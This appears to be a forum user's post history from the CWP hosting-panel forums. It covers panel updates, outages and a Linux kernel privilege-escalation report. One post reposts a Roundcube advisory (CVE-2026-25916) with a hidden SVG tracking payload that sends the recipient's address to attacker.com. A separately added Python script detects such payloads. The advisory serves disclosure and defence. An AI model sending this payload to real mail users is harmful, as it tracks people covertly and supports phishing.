This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
1
PHP Selector / Re: Support for PHP 8.4
« on: February 18, 2026, 07:18:00 PM »
You'd be better posting it here https://www.alphagnu.com as cwp spends more time down than up.
True. The forums here were down for 3 days, again.
sysadmin.help is live now also.
And SSL works

2
DNS / Re: Problem connecting to CWP server on Cloudflare
« on: February 18, 2026, 07:15:52 PM »
CWP doesn't talk to Cloudflare.
So any changes on your CWP server won't affect Cloudflare, and vice versa.
3
Other / Re: Goodbye CWP — I’m done for good
« on: February 18, 2026, 07:10:18 PM »
Completely agree with Jaspreet Singh.
This project seems to be dead, as we have not received any updates since Nov 2024, and there is no support on the forum either.
Some time ago, I contacted the CWP team, and they said they were working, but they blocked me then. There are a few members who are running the forum by just saying "CWP Team is working, CWP is not dead, blah blah, etc.." and a few of them are sharing their article users, but the actual CWP team doesn't bother looking at the forum.
It's time to move on
Project is NOT DEAD. Not sure why you keep posting that line...
CWP pushed an update today (2026-02-18) 0.9.8.1222.
And before that 0.9.8.1221 was pushed on 2026-02-02
It's personal preference if you want to stop using CWP and 'move on'
I've tested other panels, and they all have CVEs and can not be kept updated as easily as CWP can be.
Some don't even have the features CWP has, and cost $$$ more.
Can CWP do better with some things, yes.
4
Other / Re: CWP Forums constantly down
« on: February 12, 2026, 11:03:27 AM »
Yes, I have already reported the problem to José, it is due to an old and no longer updated version of SMF. I suggested to José that he switch to PHPBB, which is much more robust and much better in this regard.
phpBB is good, but SMF 2.1.6 seemed better IMO, but I got outvoted for another project. :/
sysadmin.help is finally live.
Feel free to post here & there.
5
PHP Selector / Re: Support for PHP 8.4
« on: February 12, 2026, 11:00:29 AM »
The guide at:
https://www.alphagnu.com/topic/615-install-latest-version-of-php-84-php-switcher-in-cwp-control-web-panel-el89-almalinux-89/
Is for both AlmaLinux 8 and 9.
If you are running either of those you should not have to 'tweak' any paths.
Some modules were retired when PHP 8.4 was released, like IMAP in 8.4, that now need to be loaded via PECL.
6
Mod_Security / Re: Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback
« on: February 11, 2026, 08:40:41 PM »
The OWASP CRS Ruleset is the best to use, and is free, and using their other half ModSecurity, it is easy to disable any rules needed.
8
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« on: February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute, meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
Code:
<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field | Value
CVE | CVE-2026-25916
Vendor | Roundcube
Product | Roundcube Webmail
Affected Versions | <1.5.13, <1.6.13
Disclosure Date | 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage|image|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
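Added example, not part of the original post or of Roundcube's code: a simplified Python model of the image-attribute check the article describes, run over a constructed message to show which remote load the pre-fix rule fails to treat as an image. The function names, the FETCH_ON_RENDER set and the tracker.example host are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# (tag, attribute) pairs that load a resource as soon as the message renders.
# Limited to the four the article names; html.parser lowercases tag names.
FETCH_ON_RENDER = {("img", "src"), ("image", "href"), ("use", "href"), ("feimage", "href")}
REMOTE = re.compile(r"^https?://", re.I)

def image_rule_before(tag, attr):
    """Simplified model of the pre-fix check: <feImage href> is not listed."""
    return (tag, attr) in {("img", "src"), ("image", "href"), ("use", "href")}

def image_rule_after(tag, attr):
    """Simplified model of the fixed check, using the regex quoted in the article."""
    return (tag, attr) == ("img", "src") or (
        attr == "href" and re.match(r"^(feimage|image|use)$", tag, re.I) is not None)

class RemoteLoadAudit(HTMLParser):
    """Record remote loads that a given image rule fails to classify as images."""
    def __init__(self, image_rule):
        super().__init__()
        self.image_rule = image_rule
        self.missed = []

    def handle_starttag(self, tag, attrs):
        for attr, value in attrs:
            if (tag, attr) in FETCH_ON_RENDER and value and REMOTE.match(value.strip()):
                # Not an image attribute -> handled as a link, where http(s) is allowed.
                if not self.image_rule(tag, attr):
                    self.missed.append((tag, attr, value))

def audit(html, image_rule):
    parser = RemoteLoadAudit(image_rule)
    parser.feed(html)
    parser.close()
    return parser.missed

# Constructed sample message body; tracker.example is a placeholder host.
SAMPLE = """<p>Hello <a href="https://example.com/">link</a></p>
<img src="https://tracker.example/pixel.png">
<svg width="1" height="1"><defs><filter id="t">
<feImage href="https://tracker.example/open?id=constructed" width="1" height="1"/>
</filter></defs><rect filter="url(#t)" width="1" height="1"/></svg>"""

if __name__ == "__main__":
    print("before fix:", audit(SAMPLE, image_rule_before))
    print("after fix: ", audit(SAMPLE, image_rule_after))
```

The same audit() call can be pointed at HTML bodies exported from a mail store to list messages that rely on this gap on an unpatched install.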
9
CentOS 9 Problems / New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
« on: February 09, 2026, 03:36:30 PM »
For those running CentOS Stream 9, this is a Major Vulnerability.
New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/
A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.
The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.
The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.
Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.
Code:
static s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
                        struct sk_buff **to_free)
{
    // ...
    if (q->buffer_used > q->buffer_limit) { // [1] Check buffer limit
        u32 dropped = 0;
        while (q->buffer_used > q->buffer_limit) {
            dropped++;
            cake_drop(sch, to_free); // [2] Packet is DROPPED here
        }
        b->drop_overlimit += dropped;
    }
    return NET_XMIT_SUCCESS; // [!] Returns SUCCESS anyway
}
Root Cause in CAKE Scheduler
The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.
The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.
Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.
10
CSF Firewall / Re: Should we update CSF to V15??
« on: February 06, 2026, 02:19:35 PM »
They are 2 separate CSF forks.
Hence all the forks have different version numbers now, not a universal one.
Some could use the last CSF v15.00 code, call it CSF2 with v1.0
If you want to switch to the Sentinel fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.
But it's all personal preference at this time.
11
CentOS 9 Problems / Re: ClamAV issue in user panel
« on: February 05, 2026, 12:23:49 PM »
With AlmaLinux 9, things have to be installed in a certain way.
Including ClamAV.
If not, they will not work.
There is an old install guide running around the forums on the proper way to install AlmaLinux 9 and CWP.
12
Mod_Security / Re: atomic crop. free waf rules set
« on: January 31, 2026, 06:49:36 PM »
By all means have fun using AI...
When your server is hacked, maybe you can ask it for help also...
But don't blame CWP or anything else when it happens...
13
Mod_Security / Re: atomic crop. free waf rules set
« on: January 31, 2026, 06:13:07 PM »
Ah, I'm not a Sys Admin and don't know what I'm doing, so let me use ChatGPT... 
Thanks for the laughs...
And the basic security holes that ALL hackers use, that AI just opened your server to...
Using that guide, you might as well just uninstall ModSecurity...

14
Updates / Re: Is CWP dead? Looking for alternatives
« on: January 13, 2026, 01:49:48 PM »
I agree, the forums being down for hours and sometimes days is very annoying.
CWP claims it's due to Layer 7 DDoS attacks.
Where is the source of this information?
There are multiple affirmations like this made by you, but no source to confirm this.
And I doubt that is the answer, since the issue is clearly because of a misconfigured server where the forum is - many times there are Nginx errors. And just look at how outdated and with MANY errors this installation of SMF is - you cannot even enter a user profile.
CWP isn't without flaws, but compared to other panels, CWP can be updated/customized better than others on the market I've tested.
That is what's nice about CWP, you can update certain components without breaking the control panel, just like you can with Webmin/Virtualmin.
Can you provide any example of what you are talking about?
"customized" like what?
Not sure about anyone else, but I've offered to help, but have been turned down.
Your "help" was "But by all means move to cPanel...". I am quoting YOU.
Of course your help is turned down - not because you are the victim, but because you didn't provide any help really.
1. The source of that information is directly from CWP via a support ticket I submitted.
You can doubt whatever you want, but that is the answer I received from them.
Only real problem with the forums is an expired SSL.
2. There are many aspects from HTTP, PHP, ModSecurity, etc., but since you don't know, that shows you probably don't use CWP.
3. Yup. You are just a BS poster, @overseer and myself provide a majority of help here.
And I was talking about offering help to CWP also.
All you seem to be doing is posting hate without knowing how CWP really works via GUI and CLI.
15
Updates / Re: Is CWP dead? Looking for alternatives
« on: January 13, 2026, 12:38:04 PM »
CWP isn't without flaws, but compared to other panels, CWP can be updated/customized better than others on the market I've tested.
That is what's nice about CWP, you can update certain components without breaking the control panel, just like you can with Webmin/Virtualmin.
Just look at my PHP thread on updates.
I agree, the forums being down for hours and sometimes days is very annoying.
CWP claims it's due to Layer 7 DDoS attacks.
But since you hate CWP so much, and like Ubuntu/Debian you can use your CloudPanel, and leave CWP...
Or use HestiaCP.
If you switch to either I would recommend using Debian for production use.
As using Ubuntu would be like using Fedora.
Neither uses ELx, and doesn't have some of the features of CWP.
It's as simple as that...
Not sure about anyone else, but I've offered to help, but have been turned down.
